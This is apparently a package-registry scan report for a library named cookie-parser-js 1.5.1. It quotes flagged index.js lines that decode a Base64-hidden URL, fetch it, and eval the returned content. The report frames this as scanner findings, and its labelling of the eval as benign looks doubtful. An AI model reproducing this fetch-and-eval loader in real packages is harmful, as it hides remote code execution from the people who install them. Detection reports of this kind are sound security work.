registry  /  cookie-parser-js  /  1.5.1

cookie-parser-js@1.5.1

Parse HTTP request cookies

Static Scan Results

scanned 2h ago · by rust-scanner

Static analysis flagged 5 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
EvalNetwork
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 3.93 KB of source

Source & flagged code

2 flagged · loading source
index.jsView file
60L61: httpsGet(atob('[redacted]')) L62: .then((data) => {
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

index.jsView on unpkg · L60
63const r = JSON.parse(data); L64: eval(r.content) L65: })
Low
Eval

Package source references a known benign dynamic code generation pattern.

index.jsView on unpkg · L63

Findings

1 High1 Medium3 Low
HighBase64 Obscured Urlindex.js
MediumNetwork
LowScripts Present
LowEvalindex.js
LowHigh Entropy Strings